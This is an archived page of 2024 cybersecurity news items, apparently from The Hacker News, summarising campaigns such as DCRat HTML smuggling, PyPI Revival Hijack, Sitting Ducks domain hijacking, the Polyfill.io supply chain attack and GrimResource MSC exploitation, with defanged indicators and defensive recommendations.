Hacking 2024 2023 2022 2021 2020
New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users
27.9.24 Hacking The Hacker News
Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.
The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF attachments or macro-laced Microsoft Excel documents.
"HTML smuggling is primarily a payload delivery mechanism," Netskope researcher Nikhil Hegde said in an analysis published Thursday. "The payload can be embedded within the HTML itself or retrieved from a remote resource."
The HTML file, in turn, can be propagated via bogus sites or malspam campaigns. Once the file is launched via the victim's web browser, the concealed payload is decoded and downloaded onto the machine.
The attack subsequently banks on some level of social engineering to convince the victim to open the malicious payload.
Netskope said it discovered HTML pages mimicking TrueConf and VK in the Russian language that when opened in a web browser, automatically download a password-protected ZIP archive to disk in an attempt to evade detection. The ZIP payload contains a nested RarSFX archive that ultimately leads to the deployment of the DCRat malware.
First released in 2018, DCRat is capable of functioning as a full-fledged backdoor that can be paired with additional plugins to extend its functionality. It can execute shell commands, log keystrokes, and exfiltrate files and credentials, among others.
Organizations are recommended to review HTTP and HTTPS traffic to ensure that systems are not communicating with malicious domains.
The development comes as Russian companies have been targeted by a threat cluster dubbed Stone Wolf to infect them with Meduza Stealer by sending phishing emails masquerading as a legitimate provider of industrial automation solutions.
"Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim," BI.ZONE said. By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments."
It also follows the emergence of malicious campaigns that have likely leveraged generative artificial intelligence (GenAI) to write VBScript and JavaScript code responsible for spreading AsyncRAT via HTML smuggling.
"The scripts' structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints."
Researchers Find Over 22,000 Removed PyPI Packages at Risk of Revival Hijack
5.9.24 Hacking The Hacker News
A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations.
It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package downloads. These susceptible packages have more than 100,000 downloads or have been active for over six months.
"This attack technique involves hijacking PyPI software packages by manipulating the option to re-register them once they're removed from PyPI's index by the original owner," JFrog security researchers Andrey Polkovnychenko and Brian Moussalli said in a report shared with The Hacker News.
At its core, the attack hinges on the fact that Python packages published in the PyPI repository may get removed, making available the names of those deleted projects for registration to any other user.
Statistics shared by JFrog show that about 309 packages are removed each month on average. These could happen for any number of reasons: Lack of maintenance (i.e., abandonware), package getting re-published under a different name, or introducing the same functionality into official libraries or built-in APIs.
This also poses a lucrative attack surface that's more effective than typosquatting and which an attacker, using their own accounts, could exploit to publish malicious packages under the same name and a higher version to infect developer environments.
"The technique does not rely on the victim making a mistake when installing the package," the researchers said, pointing out how Revival Hijack can yield better results from the point of view of an adversary. "Updating a 'once safe' package to its latest version is viewed as a safe operation by many users."
While PyPI does have safeguards in place against author impersonation and typosquatting attempts, JFrog's analysis found that running the "pip list --outdated" command lists the counterfeit package as a new version of the original package, wherein the former corresponds to a different package from an entirely different author.
Even more concerning, running the "pip install –upgrade" command replaces the actual package with the phony one without not so much of a warning that the package's author has changed, potentially exposing unwitting developers to a huge software supply chain risk.
JFrog said it took the step of creating a new PyPI user account called "security_holding" that it used to safely hijack the susceptible packages and replace them with empty placeholders so as to prevent malicious actors from capitalizing on the removed packages.
Additionally, each of these packages has been assigned the version number as 0.0.0.1 – the opposite of a dependency confusion attack scenario – to avoid getting pulled by developers when running a pip upgrade command.
What's more disturbing is that Revival Hijack has already been exploited in the wild, with an unknown threat actor called Jinnis introducing a benign version of a package named "pingdomv3" on March 30, 2024, the same day the original owner (cheneyyan) removed the package from PyPI.
On April 12, 2024, the new developer is said to have released an update containing a Base64-encoded payload that checks for the presence of the "JENKINS_URL" environment variable, and if present, executes an unknown next-stage module retrieved from a remote server.
"This suggests that the attackers either delayed the delivery of the attack or designed it to be more targeted, possibly limiting it to a specific IP range," JFrog said.
The new attack is a sign that threat actors are eyeing supply chain attacks on a broader scale by targeting deleted PyPI packages in order to expand the reach of the campaigns. Organizations and developers are recommended to inspect their DevOps pipelines to ensure that they are not installing packages that have been already removed from the repository.
"Using a vulnerable behavior in the handling of removed packages allowed attackers to hijack existing packages, making it possible to install it to the target systems without any changes to the user's workflow," said Moussalli, JFrog Security Research Team Lead.
"The PyPI package attack surface is continually growing. Despite proactive intervention here, users should always stay vigilant and take the necessary precautions to protect themselves and the PyPI community from this hijack technique."
Over 1 Million Domains at Risk of 'Sitting Ducks' Domain Hijacking Technique
1.8.24 Hacking The Hacker News
Over a million domains are susceptible to takeover by malicious actors by means of what has been called a Sitting Ducks attack.
The powerful attack vector, which exploits weaknesses in the domain name system (DNS), is being exploited by over a dozen Russian-nexus cybercriminal actors to stealthily hijack domains, a joint analysis published by Infoblox and Eclypsium has revealed.
"In a Sitting Ducks attack, the actor hijacks a currently registered domain at an authoritative DNS service or web hosting provider without accessing the true owner's account at either the DNS provider or registrar," the researchers said.
"Sitting Ducks is easier to perform, more likely to succeed, and harder to detect than other well-publicized domain hijacking attack vectors, such as dangling CNAMEs."
Once a domain has been taken over by the threat actor, it could be used for all kinds of nefarious activities, including serving malware and conducting spams, while abusing the trust associated with the legitimate owner.
Details of the "pernicious" attack technique were first documented by The Hacker Blog in 2016, although it remains largely unknown and unresolved to date. More than 35,000 domains are estimated to have been hijacked since 2018.
"It is a mystery to us," Dr. Renee Burton, vice president of threat intelligence at Infoblox, told The Hacker News. "We frequently receive questions from prospective clients, for example, about dangling CNAME attacks which are also a hijack of forgotten records, but we have never received a question about a Sitting Ducks hijack."
At issue is the incorrect configuration at the domain registrar and the authoritative DNS provider, coupled with the fact that the nameserver is unable to respond authoritatively for a domain it's listed to serve (i.e., lame delegation).
It also requires that the authoritative DNS provider is exploitable, permitting the attacker to claim ownership of the domain at the delegated authoritative DNS provider while not having access to the valid owner's account at the domain registrar.
In such a scenario, should the authoritative DNS service for the domain expire, the threat actor could create an account with the provider and claim ownership of the domain, ultimately impersonating the brand behind the domain to distribute malware.
"There are many variations [of Sitting Ducks], including when a domain has been registered, delegated, but not configured at the provider," Burton said.
The Sitting Ducks attack has been weaponized by different threat actors, with the stolen domains used to fuel multiple traffic distribution systems (TDSes) such as 404 TDS (aka Vacant Viper) and VexTrio Viper. It has also been leveraged to propagate bomb threat hoaxes and sextortion scams.
"Organizations should check the domains they own to see if any are lame and they should use DNS providers that have protection against Sitting Ducks," Burton said.
Patchwork Hackers Target Bhutan with Advanced Brute Ratel C4 Tool
25.7.24 Hacking The Hacker News
The threat actor known as Patchwork has been linked to a cyber attack targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell.
The development marks the first time the adversary has been observed using the red teaming software, the Knownsec 404 Team said in an analysis published last week.
The activity cluster, also called APT-C-09, Dropping Elephant, Operation Hangover, Viceroy Tiger, and Zinc Emerson, is a state-sponsored actor likely of Indian origin.
Known for conducting spear-phishing and watering hole attacks against China and Pakistan, the hacking crew is believed to be active since at least 2009, according to data shared by Chinese cybersecurity firm QiAnXin.
Last July, Knownsec 404 disclosed details of an espionage campaign aimed at universities and research organizations in China that leveraged a .NET-based implant codenamed EyeShell to fetch and execute commands from an attacker-controlled server, run additional payloads, and capture screenshots.
Then earlier this February, it was found that the threat actor had employed romance-themed lures to ensnare victims in Pakistan and India and compromise their Android devices with a remote access trojan dubbed VajraSpy.
The starting point of the latest observed attack chain is a Windows shortcut (LNK) file that's designed to download a decoy PDF document from a remote domain impersonating the UNFCCC-backed Adaptation Fund, while stealthily deploying Brute Ratel C4 and PGoShell retrieved from a different domain ("beijingtv[.]org").
"PGoShell is developed in the Go programming language; overall, it offers a rich set of functionalities, including remote shell capabilities, screen capture, and downloading and executing payloads," the cybersecurity company said.
The development comes months after APT-K-47 – another threat actor sharing tactical overlaps with SideWinder, Patchwork, Confucius, and Bitter – was attributed to attacks involving the use of ORPCBackdoor as well as previously undocumented malware like WalkerShell, DemoTrySpy, and NixBackdoor to harvest data and execute shellcode.
The attacks are also notable for deploying an open-source command-and-control (C2) framework known as Nimbo-C2, which "enables a wide range of remote control functionalities," Knownsec 404 said.
Experts Uncover Chinese Cybercrime Network Behind Gambling and Human Trafficking
23.7.24 Hacking The Hacker News
The relationship between various TDSs and DNS associated with Vigorish Viper and the final landing experience for the user
A Chinese organized crime syndicate with links to money laundering and human trafficking across Southeast Asia has been using an advanced "technology suite" that runs the whole cybercrime supply chain spectrum to spearhead its operations.
Infoblox is tracking the proprietor and maintainer under the moniker Vigorish Viper, noting that it's developed by the Yabo Group (aka Yabo Sports), which has been linked to illegal gambling operations and pig butchering scams in the past. In late 2022, it rebranded as Kaiyun Sports and has since been absorbed into another newly formed entity called Ponymuah.
The suite, marketed in China as "baowang" ("包网," meaning full package) encompasses several components such as Domain Name System (DNS) configurations, website hosting, payment mechanisms, advertising, and mobile apps. It also hosts thousands of domain names and numerous brands in an infrastructure that's tied to Hong Kong and China.
The enterprise hinges on securing European football club sponsorships using front companies or white label brands, and using them as a "force multiplier" to advertise illegal gambling sites in the region with the goal of attracting more bettors. In July 2023, it was reported that betting company logos appeared as often as 3,500 times during the course of a televised football match.
Yabo, Ponymuah, and other related offshoots like OB (aka OBGM), DB Gaming, Panda Sports, KM Gaming, and Smart King Games (SKG) are all part of Vigorish Viper's sprawling network, highlighting the tangled and murky ownership of the gambling companies and the painstaking steps undertaken to sidestep scrutiny.
It's not just English football clubs that have engaged in these sponsorships, as the investigation has unearthed that cricket and kabaddi teams in India have also entered into similar sponsorship agreements to advertise Vigorish Viper brands.
"Vigorish Viper operates a vast network of over 170,000 active domain names, evading detection and law enforcement through its sophisticated use of DNS CNAME traffic distribution systems," Infoblox researchers Maël Le Touz, Jacques Portal, Renée Burton, and Elena Puga in an exhaustive report shared with The Hacker News.
"In addition to gambling, Vigorish Viper's CNAME [traffic distribution systems] serve illegal streaming and pornography sites. Some of the domains used for streaming are long-registered domains that Vigorish Viper picked up after the original registration expired."
Burton, vice president of threat intelligence at Infoblox, described the threat actor as "one of the most sophisticated and important threats to digital security" discovered to date.
An overview of Vigorish Viper's sports sponsorship scheme
"Vigorish Viper created a complex infrastructure with multiple layers of traffic distribution systems (TDSs) using DNS CNAME records and JavaScript, which makes it incredibly difficult to detect," Burton said in a statement. "These systems are complemented by their own encrypted communications and custom-developed applications, making their activities not only elusive but also remarkably resilient."
This entails the use of DNS CNAME records to redirect traffic from one domain through another, a technique previously adopted by other DNS threat actors like Savvy Seahorse. Furthermore, the system has the capability to differentiate between residential, mobile, and commercial IP addresses in China.
Earlier this January, the Danish Institute for Sports Studies' Play the Game initiative uncovered connections between dozens of European football clubs and illegal gambling brands that can be traced back to Yabo and target jurisdictions like China where gambling is prohibited and considered an organized crime.
The online crimes also have an offline aspect involving human trafficking wherein people are lured with the promise of high-paying jobs and are coerced into supporting sports betting schemes and promoting pig butchering scams and other cryptocurrency scams, according to the Asian Racing Federation (ARF).
"Operating in teams of 8-10, some coordinate with commentators and broadcasters of live sport (presumably on pirate streams) to promote live chat groups marketing betting websites during games," according to a report [PDF] released by the ARF in October 2023. "Others act as relationship managers to encourage customers to continue betting and others as direct customer recruitment agents."
Steps between when a user visits a site and starts placing bets
Infoblox said its own investigation into Vigorish Viper stemmed from a single anomalous domain, kb[.]com – a gambling site named KB Sports that uses Chinese nameservers – which also hosts yabo[.]com, the domain name for Yabo Sports.
An interesting aspect to note here is that the website is geo-blocked to users located in France and elsewhere in Europe, but is accessible from mainland China and the special administrative regions of Hong Kong and Macau.
"When visited from one of those areas, the user is redirected to another domain — for example, kb830[.]com," the researchers pointed out. "The redirection domain changes over time. Additionally, all 'right click' functionality is disabled on the site, as is text selection, hindering efforts to investigate or copy the site."
Users to the website are then served ads promoting financial incentives for betting regularly, alongside options to pay using WeChat Pay, EBpay, Alipay, JD Pay, KOIPay, AstroPay, YunShanFu, UniPay, Net Pay, Fast Pay, and NetBank. The betting takes place through agents, who place the bets, manage the deposits, and communicate with gamblers through bespoke, encrypted chat apps.
A deeper examination of the DNS query logs has also unearthed evidence that Vigorish Viper's activities transcend China to target users across the world.
Some of the other defense mechanisms embedded in these sites comprise periodically checking for signs of automated activity and serving a CAPTCHA puzzle for visitors in an attempt to avoid potential scanning efforts, or when trying to reach customer support, a task carried out by real people who have been trafficked into Southeast Asia.
That's not all. Users visiting one of Vigorish Viper's brand domains are subjected to multiple rounds of fingerprinting checks to validate that the IP address is in China and they are legitimate, before they are allowed to bet on the sites.
"Both the DNS and the software tie Vigorish Viper's entire enterprise to Yabo Sports or Yabo Group," the company said. "Their reach extends to dozens of brands, possibly hundreds, and targets users beyond Southeast Asia."
"In spite of the massive number of domain names, websites, and accompanying applications, along with overt presence in the public eye, Vigorish Viper is operating directly and inexplicably in the PRC without meaningful consequence."
GitHub Token Leak Exposes Python's Core Repositories to Potential Attacks
16.7.24 Hacking The Hacker News
Cybersecurity researchers said they discovered an accidentally leaked GitHub token that could have granted elevated access to the GitHub repositories of the Python language, Python Package Index (PyPI), and the Python Software Foundation (PSF) repositories.
JFrog, which found the GitHub Personal Access Token, said the secret was leaked in a public Docker container hosted on Docker Hub.
"This case was exceptional because it is difficult to overestimate the potential consequences if it had fallen into the wrong hands – one could supposedly inject malicious code into PyPI packages (imagine replacing all Python packages with malicious ones), and even to the Python language itself," the software supply chain security company said.
An attacker could have hypothetically weaponized their admin access to orchestrate a large-scale supply chain attack by poisoning the source code associated with the core of the Python programming language, or the PyPI package manager.
JFrog noted that the authentication token was found inside a Docker container, in a compiled Python file ("build.cpython-311.pyc") that was inadvertently not cleaned up.
Following responsible disclosure on June 28, 2024, the token – which was issued for the GitHub account linked to PyPI Admin Ee Durbin – was immediately revoked. There is no evidence that the secret was exploited in the wild.
PyPI said the token was issued sometime prior to March 3, 2023, and that the exact date is unknown due to the fact that security logs are unavailable beyond 90 days.
"While developing cabotage-app5 locally, working on the build portion of the codebase, I was consistently running into GitHub API rate limits," Durbin explained.
"These rate limits apply to anonymous access. While in production the system is configured as a GitHub App, I modified my local files to include my own access token in an act of laziness, rather than configure a localhost GitHub App. These changes were never intended to be pushed remotely."
The disclosure comes as Checkmarx uncovered a series of malicious packages on PyPI that are designed to exfiltrate sensitive information to a Telegram bot without victims' consent or knowledge.
The packages in question – testbrojct2, proxyfullscraper, proxyalhttp, and proxyfullscrapers – work by scanning the compromised system for files matching extensions like .py, .php, .zip, .png, .jpg, and .jpeg.
"The Telegram bot is linked to multiple cybercriminal operations based in Iraq," Checkmarx researcher Yehuda Gelb said, noting the bot's message history dates all the way back to 2022.
"The bot functions also as an underground marketplace offering social media manipulation services. It has been linked to financial theft and exploits victims by exfiltrating their data."
CRYSTALRAY Hackers Infect Over 1,500 Victims Using Network Mapping Tool
15.7.24 Hacking The Hacker News
A threat actor that was previously observed using an open-source network mapping tool has greatly expanded their operations to infect over 1,500 victims.
Sysdig, which is tracking the cluster under the name CRYSTALRAY, said the activities have witnessed a 10x surge, adding it includes "mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple [open-source software] security tools."
The primary objective of the attacks is to harvest and sell credentials, deploy cryptocurrency miners, and maintain persistence in victim environments.
Prominent among the open-source programs used by the threat actor is SSH-Snake, which was first released in January 2024. It has been described as a tool to carry out automatic network traversal using SSH private keys discovered on systems.
The abuse of the software by CRYSTALRAY was documented by the cybersecurity company earlier this February, with the tool deployed for lateral movement following the exploitation of known security flaws in public-facing Apache ActiveMQ and Atlassian Confluence instances.
Joshua Rogers, the developer behind SSH-Snake told The Hacker News at the time that the tool only automates what would have been otherwise manual steps, and called on companies to "discover the attack paths that exist – and fix them."
Some of the other tools employed by the attackers include asn, zmap, httpx, and nuclei in order to check if a domain is active and launch scans for vulnerable services such as Apache ActiveMQ, Apache RocketMQ, Atlassian Confluence, Laravel, Metabase, Openfire, Oracle WebLogic Server, and Solr.
CRYSTALRAY also weaponizes its initial foothold to conduct a wide-ranging credential discovery process that goes beyond moving between servers accessible via SSH. Persistent access to the compromised environment is accomplished by means of a legitimate command-and-control (C2) framework called Sliver and a reverse shell manager codenamed Platypus.
In a further bid to derive monetary value from the infected assets, cryptocurrency miner payloads are delivered to illicitly use the victim resources for financial gain, while simultaneously taking steps to terminate competing miners that may have already been running on the machines.
"CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which are then sold on black markets for thousands of dollars," Sysdig researcher Miguel Hernández said. "The credentials being sold involve a multitude of services, including Cloud Service Providers and SaaS email providers."
Polyfill[.]io Attack Impacts Over 380,000 Hosts, Including Major Companies
5.7.24 Hacking The Hacker News
The supply chain attack targeting widely-used Polyfill[.]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.
This includes references to "https://cdn.polyfill[.]io" or "https://cdn.polyfill[.]com" in their HTTP responses, the attack surface management firm said.
"Approximately 237,700, are located within the Hetzner network (AS24940), primarily in Germany," it noted. "This is not surprising – Hetzner is a popular web hosting service, and many website developers leverage it."
Further analysis of the affected hosts has revealed domains tied to prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson that reference the malicious endpoint in question. Details of the attack emerged in late June 2024 when Sansec alerted that code hosted on the Polyfill domain had been modified to redirect users to adult- and gambling-themed websites. The code changes were made such that the redirections only took place at certain times of the day and only against visitors who met certain criteria.
The nefarious behavior is said to have been introduced after the domain and its associated GitHub repository were sold to a Chinese company named Funnull in February 2024.
The development has since prompted domain registrar Namecheap to suspend the domain, content delivery networks such as Cloudflare to automatically replace Polyfill links with domains leading to alternative safe mirror sites, and Google to block ads for sites embedding the domain.
While the operators attempted to relaunch the service under a different domain named polyfill[.]com, it was also taken down by Namecheap as of June 28, 2024. Of the two other domains registered by them since the start of July – polyfill[.]site and polyfillcache[.]com – the latter remains up and running.
On top of that, a more extensive network of potentially related domains, including bootcdn[.]net, bootcss[.]com, staticfile[.]net, staticfile[.]org, unionadjs[.]com, xhsbpza[.]com, union.macoms[.]la, newcrbpc[.]com, has been uncovered as tied to the maintainers of Polyfill, indicating that the incident might be part of a broader malicious campaign.
"One of these domains, bootcss[.]com, has been observed engaging in malicious activities that are very similar to the polyfill[.]io attack, with evidence dating back to June 2023," Censys noted, adding it discovered 1.6 million public-facing hosts that link to these suspicious domains.
"It wouldn't be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future."
The development comes as WordPress security company Patchstack warned of cascading risks posed by the Polyfill supply chain attack on sites running the content management system (CMS) through dozens of legitimate plugins that link to the rogue domain.
Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks
3.7.24 Hacking The Hacker News
Cybersecurity researchers have discovered an attack campaign that targets various Israeli entities with publicly-available frameworks like Donut and Sliver.
The campaign, believed to be highly targeted in nature, "leverage target-specific infrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities across unrelated verticals, and rely on well-known open-source malware," HarfangLab said in a report last week.
The French company is tracking the activity under the name Supposed Grasshopper. It's a reference to an attacker-controlled server ("auth.economy-gov-il[.]com/SUPPOSED_GRASSHOPPER.bin"), to which a first-stage downloader connects to.
This downloader, written in Nim, is rudimentary and is tasked with downloading the second-stage malware from the staging server. It's delivered by means of a virtual hard disk (VHD) file that's suspected to be propagated via custom WordPress sites as part of a drive-by download scheme.
The second-stage payload retrieved from the server is Donut, a shellcode generation framework, which serves as a conduit for deploying an open-source Cobalt Strike alternative called Sliver.
"The operators also put some notable efforts in acquiring dedicated infrastructure and deploying a realistic WordPress website to deliver payloads," the researchers said. "Overall, this campaign feels like it could realistically be the work of a small team."
The end goal of the campaign is currently unknown, although HarfangLab theorized that it could also be associated with a legitimate penetration testing operation, a possibility that raises its own set of questions surrounding transparency and the need for impersonating Israeli government agencies.
The disclosure comes as the SonicWall Capture Labs threat research team detailed an infection chain that employs booby-trapped Excel spreadsheets as a starting point to drop a trojan known as Orcinius.
"This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated," the company said. "It contains an obfuscated VBA macro that hooks into Windows to monitor running windows and keystrokes and creates persistence using registry keys."
Australian Man Charged for Fake Wi-Fi Scam on Domestic Flights
2.7.24 Hacking The Hacker News
An Australian man has been charged with running a fake Wi-Fi access point during a domestic flight with an aim to steal user credentials and data.
The unnamed 42-year-old "allegedly established fake free Wi-Fi access points, which mimicked legitimate networks, to capture personal data from unsuspecting victims who mistakenly connected to them," the Australian Federal Police (AFP) said in a press release last week.
Cybersecurity
The agency said the suspect was charged in May 2024 after it launched an investigation a month earlier following a report from an airline about a suspicious Wi-Fi network identified by its employees during a domestic flight.
A subsequent search of his baggage on April 19 led to the seizure of a portable wireless access device, a laptop, and a mobile phone. He was arrested on May 8 after a search warrant was executed at his home.
The individual is said to have staged what's called an evil twin Wi-Fi attack across various locations, including domestic flights and airports in Perth, Melbourne, and Adelaide, to impersonate legitimate Wi-Fi networks.
Users who attempted to connect to the free, phony network were prompted to enter their email address or social media credentials through a captive portal web page.
"The email and password details harvested could be used to access more personal information, including a victim's online communications, stored images and videos, or bank details," the AFP said.
The defendant has been charged with three counts of unauthorized impairment of electronic communication and three counts of possession or control of data with the intent to commit a serious offense.
Cybersecurity
He has also been charged with one count of unauthorized access or modification of restricted data, one count of dishonestly obtaining or dealing in personal financial information, and one count of possession of identification information. If convicted, he faces up to a maximum of 23 years in prison.
"To connect to a free Wi-Fi network, you shouldn't have to enter any personal details -- such as logging in through an email or social media account," AFP Western Command Cybercrime Detective Inspector Andrea Coleman said.
"If you do want to use public Wi-Fi hotspots, install a reputable virtual private network (VPN) on your devices to encrypt and secure your data when using the internet."
Over 110,000 Websites Affected by Hijacked Polyfill Supply Chain Attack
27.6.24 Hacking The Hacker News
Google has taken steps to block ads for e-commerce sites that use the Polyfill.io service after a Chinese company acquired the domain and modified the JavaScript library ("polyfill.js") to redirect users to malicious and scam sites.
More than 110,000 sites that embed the library are impacted by the supply chain attack, Sansec said in a Tuesday report.
"Protecting our users is our top priority. We detected a security issue recently that may affect websites using certain third-party libraries," the company said in a statement shared with The Hacker News. "To help potentially impacted advertisers secure their websites, we have been proactively sharing information on how to quickly mitigate the issue."
Polyfill is a popular library that incorporates support for modern functions in web browsers. Earlier this February, concerns were raised following its purchase by China-based content delivery network (CDN) company Funnull.
The original creator of the project, Andrew Betts, urged website owners to immediately remove it, adding "no website today requires any of the polyfills in the polyfill[.]io library" and that "most features added to the web platform are quickly adopted by all major browsers, with some exceptions that generally can't be polyfilled anyway, like Web Serial and Web Bluetooth."
The development also prompted web infrastructure providers Cloudflare and Fastly to offer alternative endpoints to help users move away from polyfill[.]io.
"The concerns are that any website embedding a link to the original polyfill[.]io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack," Cloudflare researchers Sven Sauleau and Michael Tremante noted at the time.
"Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."
The Dutch e-commerce security firm said the domain "cdn.polyfill[.]io" has since been caught injecting malware that redirects users to sports betting and pornographic sites.
"The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours," it said. "It also does not activate when it detects an admin user. It also delays execution when a web analytics service is found, presumably to not end up in the stats."
San Francisco-based c/side has also issued an alert of its own, noting that the domain maintainers added a Cloudflare Security Protection header to their site between March 7 and 8, 2024.
The findings follow an advisory about a critical security flaw impacting Adobe Commerce and Magento websites (CVE-2024-34102, CVSS score: 9.8) that continues to remain largely unpatched despite fixes being available since June 11, 2024.
"In itself, it allows anyone to read private files (such as those with passwords)," Sansec said, which codenamed the exploit chain CosmicSting. "However, combined with the recent iconv bug in Linux, it turns into the security nightmare of remote code execution."
It has since emerged that third-parties can gain API admin access without requiring a Linux version vulnerable to the iconv issue (CVE-2024-2961), making it an even more severe issue.
(The story was updated after publication to include a response from Google.)
New Attack Technique Exploits Microsoft Management Console Files
25.6.24 Hacking The Hacker News
Threat actors are exploiting a novel attack technique in the wild that leverages specially crafted management saved console (MSC) files to gain full code execution using Microsoft Management Console (MMC) and evade security defenses.
Elastic Security Labs has codenamed the approach GrimResource after identifying an artifact ("sccm-updater.msc") that was uploaded to the VirusTotal malware scanning platform on June 6, 2024.
"When a maliciously crafted console file is imported, a vulnerability in one of the MMC libraries can lead to running adversary code, including malware," the company said in a statement shared with The Hacker News.
"Attackers can combine this technique with DotNetToJScript to gain arbitrary code execution, which can lead to unauthorized access, system takeover and more."
The use of uncommon file types as a malware distribution vector is seen as an alternative attempt by adversaries to get around security guardrails erected by Microsoft in recent years, including disabling macros by default in Office files downloaded from the internet.
Last month, South Korean firm Genians detailed the use of a malicious MSC file by the North Korea-linked Kimsuky hacking group to deliver malware.
GrimResource, on the other hand, exploits a cross-site scripting (XSS) flaw present in the apds.dll library to execute arbitrary JavaScript code in the context of MMC. The XSS flaw was originally reported to Microsoft and Adobe in late 2018, although it remains unpatched to date.
This is accomplished by adding a reference to the vulnerable APDS resource in the StringTable section of a malicious MSC file, which, when opened using MMC, triggers the execution of JavaScript code.
The technique not only bypasses ActiveX warnings, it can be combined with DotNetToJScript to gain arbitrary code execution. The analyzed sample uses this approach to launch a .NET loader component dubbed PASTALOADER that ultimately paves the way for Cobalt Strike.
"After Microsoft disabled Office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity," security researchers Joe Desimone and Samir Bousseaden said.
"However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files."
Okta Warns of Unprecedented Surge in Proxy-Driven Credential Stuffing Attacks
30.4.24 Hacking The Hacker News
Identity and access management (IAM) services provider Okta has warned of a spike in the "frequency and scale" of credential stuffing attacks aimed at online services.
These unprecedented attacks, observed over the last month, are said to be facilitated by "the broad availability of residential proxy services, lists of previously stolen credentials ('combo lists'), and scripting tools," the company said in an alert published Saturday.
The findings build on a recent advisory from Cisco, which cautioned of a global surge in brute-force attacks targeting various devices, including Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Talos noted at the time, adding targets of the attacks comprise VPN appliances from Cisco, Check Point, Fortinet, SonicWall, as well as routers from Draytek, MikroTik, and Ubiquiti.
Okta said its Identity Threat Research detected an uptick in credential stuffing activity against user accounts from April 19 to April 26, 2024, from likely similar infrastructure.
Credential stuffing is a type of cyber attack in which credentials obtained from a data breach on one service are used to attempt to sign in to another unrelated service.
Alternatively, such credentials could be extracted via phishing attacks that redirect victims to credential harvesting pages or through malware campaigns that install information stealers on compromised systems.
"All recent attacks we have observed share one feature in common: they rely on requests being routed through anonymizing services such as TOR," Okta said.
"Millions of the requests were also routed through a variety of residential proxies including NSOCKS, Luminati, and DataImpulse."
Residential proxies (RESIPs) refer to networks of legitimate user devices that are misused to route traffic on behalf of paying subscribers without their knowledge or consent, thereby allowing threat actors to conceal their malicious traffic.
This is typically achieved by installing proxyware tools on computers, mobile phones, or routers, effectively enrolling them into a botnet that's then rented to customers of the service who desire to anonymize the source of their traffic.
"Sometimes a user device is enrolled in a proxy network because the user consciously chooses to download 'proxyware' into their device in exchange for payment or something else of value," Okta explained.
"At other times, a user device is infected with malware without the user's knowledge and becomes enrolled in what we would typically describe as a botnet."
Last month, HUMAN's Satori Threat Intelligence team revealed over two dozen malicious Android VPN apps that turn mobile devices into RESIPs by means of an embedded software development kit (SDK) that included the proxyware functionality.
"The net sum of this activity is that most of the traffic in these credential stuffing attacks appear to originate from the mobile devices and browsers of everyday users, rather than from the IP space of VPS providers," Okta said.
To mitigate the risk of account takeovers, the company is recommending that organizations enforce users to switch to strong passwords, enable two-factor authentication (2FA), deny requests originating from locations where they don't operate and IP addresses with poor reputation, and add support for passkeys.
Apache Cordova App Harness Targeted in Dependency Confusion Attack
24.4.24 Hacking The Hacker News
Researchers have identified a dependency confusion vulnerability impacting an archived Apache project called Cordova App Harness.
Dependency confusion attacks take place owing to the fact that package managers check the public repositories before private registries, thus allowing a threat actor to publish a malicious package with the same name to a public package repository.
This causes the package manager to inadvertently download the fraudulent package from the public repository instead of the intended private repository. If successful, it can have serious consequences, such as installing all downstream customers that install the package.
A May 2023 analysis of npm and PyPI packages stored in cloud environments by enterprise security company Orca revealed that nearly 49% of organizations are vulnerable to a dependency confusion attack.
While npm and other package managers have since introduced fixes to prioritize the private versions, application security firm Legit Security said it found the Cordova App Harness project to reference an internal dependency named cordova-harness-client without a relative file path.
The open-source initiative was discontinued by the Apache Software Foundation (ASF) as of April 18, 2019.
As Legit Security demonstrated, this left the door wide open for a supply chain attack by uploading a malicious version under the same name with a higher version number, thus causing npm to retrieve the bogus version from the public registry.
With the bogus package attracting over 100 downloads after being uploaded to npm, it indicates that the archived project is still being put to use, likely posing severe risks to users.
In a hypothetical attack scenario, an attacker could hijack the library to serve malicious code that could be executed on the target host upon package installation.
The Apache security team has since addressed the problem by taking ownership of the cordova-harness-client package. It's worth noting that organizations are advised to create public packages as placeholders to prevent dependency confusion attacks.
"This discovery highlights the need to consider third-party projects and dependencies as potential weak links in the software development factory, especially archived open-source projects that may not receive regular updates or security patches," security researcher Ofek Haviv said.
"Although it may seem tempting to leave them as is, these projects tend to have vulnerabilities that are not getting attention and not likely to be fixed."
BlackTech Targets Tech, Research, and Gov Sectors New 'Deuterbear' Tool
19.4.24 Hacking The Hacker News
